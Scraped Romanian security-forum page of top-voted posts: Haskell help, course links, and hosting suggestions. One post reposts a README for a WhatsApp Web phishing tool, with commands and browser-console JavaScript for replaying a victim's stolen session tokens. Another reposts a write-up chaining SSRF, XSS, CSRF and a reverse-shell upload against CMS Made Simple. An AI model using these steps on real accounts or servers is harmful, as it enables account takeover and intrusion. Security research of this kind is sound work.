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  1. Ok. Poti sa dai o lista de variabila - expresie si sa faci o functie getValue(lista, variabila) care iti cauta in lista var X si iti intoarce valoarea.
    2 points
  2. Buna. Ceva de genul asta: returnInt :: Expr -> Int returnInt (Value x) = x returnInt (Symbol x) = length x Unde inlocuiesti length x cu ceva care sa intoarca un intreg dintr-un string in functie de ce ai nevoie. Daca vrei sa iti intoarca eroare pentru cazul cu string: returnInt (Symbol x) = error "Eroareeee"
    2 points
  3. https://cloud.google.com/free-trial/?utm_source=fb&utm_medium=cpc&utm_campaign=2016-q1-cloud-emea-gcp-biddable-freetrial Access to all Cloud Platform Products Get everything you need to build and run your apps, websites and services. $300 credit for free Sign up and get $300 to spend on Google Cloud Platform over the next 60 days. No autocharge after free trial ends We ask you for your credit card to make sure you are not a robot. You won't be charged during or after your free trial ends.
    1 point
  4. Debian ușor personalizat (cumva neglijent) cu interfața în limba engleză, tastatura în limba spaniolă. Un buton și un wallpaper colorate cu roșu, galben și albastru (albastru, galben și roșu). Un set de pictograme de acum 10+ ani. Un script EDU_Installer. În "Edu * Ro", de ce "*" și de ce "Ro"? În "beta 2", de ce "beta" și de ce "2"? De ce ar fi bazat pe Debian și nu ar fi Debian? Lista pachetelor din imaginea 64 bit.
    1 point
  5. Daca returnExpresie evalueaza expresia respectiva ar trebui sa mai ai un parametru cu valoarea cu care se inlocuieste variabila X. Ceva de genul: returnExpresie (Symbol x) y = y. Deci in toate ecuatiile iei dupa tine parametrul y care de tip int.
    1 point
  6. Box.net, OneDrive for Business, sau daca vrei sa-ti faci ceva custom pentru nevoile tale https://owncloud.org/ + http://www.soyoustart.com/en/essential-servers/
    1 point
  7. Whatsapp phishing This repo contains proof of principle code for running a phishing attack against the official Whatsapp Web client. I also wrote about it on my German blog Whatsapp what? http://www.whatsapp.com/faq/web/28080003 Short: A web client for Whatsapp. You log in by scanning a QR code on there page using Whatsapp What does it do It will extract the QR code from Whatsapp Web and display it on a new page. If someone scans the code using Whatsapp it will grab the credentials from the web client and save them in a file. You can use these credentials to log yourself in as the person who scanned to QR code. How does it work The program uses node.js and socket.io for the website and selenium, a tool for scripting browsers, to communicate with the Whatsapp web client. The program starts a http and a socket.io server. If a new client connects to socket.io the application will make a request to a selenium instance to start a new browser and connect to web.whatsapp.com. It will fetch the QR code data and send it to the client via the websocket connection. The client javascript then shows the QR code to the user. If the QR code gets scanned Whatsapp will authenticate the selenium controlled browser and store some tokens in the localStorage and document.cookie. We extract that data and save it into a text file. It will look like so: { "s":{ "remember-me":"true", "WAVersion":"\"0.1.4391\"", "qwefsdafadsdf==":"false", "debugCursor":"146", "WAWamDimensionCache":"{\"AppVersion\":\"0.1.4391\",\"BrowserVersion\":\"Firefox 39.0\",\"DeviceName\":\"Linux x86_64\",\"WebcEnv\":0}", "WAToken2":"\"0.asldkamäsdflkasdfasdf\"", "WAWamLastRotate":"1439140177924", "WALangPref":"\"de-DE\"", "WAWamStatus":"\"completed\"", "y8fY/zQ8P+asdfadfg==":"[ ... ]", "WAToken1":"\"asdf+ams,dfhlaskdjfhasdfasdf=\"", "Dexie.DatabaseNames":"[\"wawc\"]", "storage_test":"storage_test", "LKAJsdlksdjfasdf==":"false", "logout-token":"\"alkjsdhfkjashldkjpweoaLKNKASBkasjbdaksdjLKjhhndosiaosa;AljkhJKhlKAJShkljqjDJSAOlkjbnhasdklWAdm==\"", "ver":"1", "whatsapp-mutex":"\"x781239870495:init0.987123490234\"", "WASecretBundle":"{\"key\":\"sldkfjsdf+asdlfijlasdkjfasdf=\",\"encKey\":\"asldkfjasldkfjsdfsdf0=\",\"macKey\":\"a,sdfasdf+alskdjföalskdhiopasdf=\"}", "WABrowserId":"\"aö,ksdjflöasdf==\"" }, "c":"" } You can than import these tokens into your browser and log in as the person who scanned the QR code. Instructions Download the selenium standalone server jar file and install Firefox if you don't already have it. Type the following into your terminal: $ java -jar selenium-server.jar $ # new terminal $ git clone https://github.com/Mawalu/whatsapp-phishing.git $ cd whatsapp-phishing $ npm install $ node index.js Open your browser and go to http://localhost:8080 Start Whatsapp on your smartphone, go to Menu > Whatsapp Web and scan the QR code from your browser. Copy the content from the newly created secrets file Open web.whatsapp.com. (Watch out that you are not already logged in, maybe use incognito mode) Open your developer console Enter the following code: > var t = CONTENT_OF_YOUR_SECRETS_FILE > function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });} > login(t) Reload the page You should be logged in as the person who scanned the QR code Disclaimer Whatsapp messages are meant to be private. Just because the NSA reads everything it doesn't mean you should do as well! Everything in this repo is for education purpose only and I am not responsible if you use it otherwise. Author: Martin Wagner (Mawalu) Download ZIP https://github.com/Mawalu/whatsapp-phishing
    1 point
  8. Sau http://www.inf.ed.ac.uk/teaching/courses/inf1/fp/ Aici gasesti si teorie si exercitii si solutii pentru exercitii. E un curs fain.
    1 point
  9. Recomand: Real World Haskell (download) The Haskell Road to Logic, Math and Programming (download) Beginning Haskell: A project-based approach (download)
    1 point
  10. Cu placere. Un bun inceput ar fi aici: http://learnyouahaskell.com/chapters
    1 point
  11. This is where the trouble starts. You’ve seen them. They are all over the web. Sometimes they contain valuable information or warn you before closing an important browser window. But most of the time they are really annoying and almost everybody clicks on “Ok” without really reading them. I’m talking about alert boxes. If you hear “XSS” you almost immediately think of them. And that’s a huge problem. Yes, they are a good way to show that it’s possible to to execute JavaScript on a vulnerable website. And with document.domain you also show that it is running under the sites context. But what does that mean to a website owner? He just sees an annoying box and if he doesn’t read about the dangers of XSS he won’t fully understand what it is capable of. But what can we do once we located such a flaw on a website? Stealing session cookies won’t work most of the time as they are often httponly which basically means for us that it’s not readable by JavaScript. There’s a way to abuse an XSS flaw nonetheless and I’ll show you how we can escalate it to a full blown RCE, considering we know a thing or two about the admin panel (guessing might also help sometimes). In this case we escalate our privileges from an unauthenticated remote user to www-data. The vulnerable software is described like this on wikipedia: “CMS Made Simple has a web-based admin section for theme, template, and stylesheet development, installing and updating add-on modules, configuring page content blocks, and user groups and permissions.” SSRF By default CMSMS has an activated module called “CMSPrinting”. It shows you a page in print mode. When we look at the url it’s generating we see one parameter that looks suspicious. It’s a base64 encoded string. When we decode it it shows us the following link: That host is the IP of my lab machine and the false showtemplate parameter removes unnecessary stuff from the page. Of course I immediately tried to include a local file and a remote website. Both didn’t work unfortunately. There must be something in place to prevent us from including any website we want. When we look inside the source code we see this: You see that in order to retrieve content the decoded url parameter has to start with the root url. In my case it was . You already know where this is going. Since there is no slash at the end we can easily create a subdomain called and make the cms read a file from our Server. This looks totally pointless first. We can’t execute PHP code that way and we don’t get any sensitive files. We can only mirror something from our Server to the page. But if you think about it, that’s exactly what we need to make it an… XSS You think of the alert box again, don’t you? Now you are going to be disappointed. This post is alert free. Instead we escalate it further. Since we are able to create a file on our own server that will be retrieved by the victim cms and then mirrored to the victims browser we don’t have to worry about getting caught by any XSS filter or waf. We can simply write our payload inside our local file. Here’s what it’s doing: First we use JavaScript to get the content of the Admin panel, which contains a CSRF token that has to be passed for any action the admin executes in the ACP. We then extract this key. CSRF With our obtained token and the XSS flaw we can make requests on behalf of the administrator. What we are interested in is the file upload functionality that’s also included in the standard installation. What do we do? We now have to simulate a file upload to the CMS via XSS. This can be done with an ajax post request. RCE We now upload a php file containing a reverse shell. To trigger it we create an img tag pointing to our uploaded file. And there you go. SSRF->XSS->CSRF->RCE If you have XSS on your website in almost every case your CSRF protections are useless. This can lead to account takeover, privilege escalation and also to a complete compromise of your Server. With this in mind, tell me: is an alert box really a good way to show a website owner the dangers of XSS? You decide. https://3.sendvid.com/hajs932z.mp4 Articol preluat de pe site-ul https://blog.asdizzle.com Toate drepturile rezervate asdizzle_
    1 point
  12. http://www.gfxxtra.com/tutorials/programming/680416-angularjs-from-zero-to-hero.html
    1 point
  13. Cursuri Linux facute foarte frumos limba Engleza si Germana LPI101 44 Videos | Durata 412:06 min http://www.learnity.com/kursdetails.html?Tutorialid=1471&F[tcid1]=3&F[tcid2]=409&F[tcid3]=421&F[Profileid]=851&F[OrderBy]=newest LPI102 34 Videos | Durata 451:32 min http://www.learnity.com/kursdetails.html?Tutorialid=1473&F[tcid1]=3&F[tcid2]=409&F[tcid3]=421&F[Profileid]=851&F[OrderBy]=newest
    1 point
  14. JIHAD, salut, foarte bun codul, dar am o problema la compilarea lui, se compileaza fara libssh2.so.1 inclus in sursa. si pe alte rooturi nu merge daca nu este instalata libssh2. imi poti da un sfat sa o pot compila cu libssh2.so inclus in proiect ? astept PM. ms anticipat
    -1 points
  15. Scriu articole unice de calitate , 150 cuvinte=0.5$ daca doriti mai multe detali lasa-ti mesaj aici sau pe skype: leviberlin2
    -1 points
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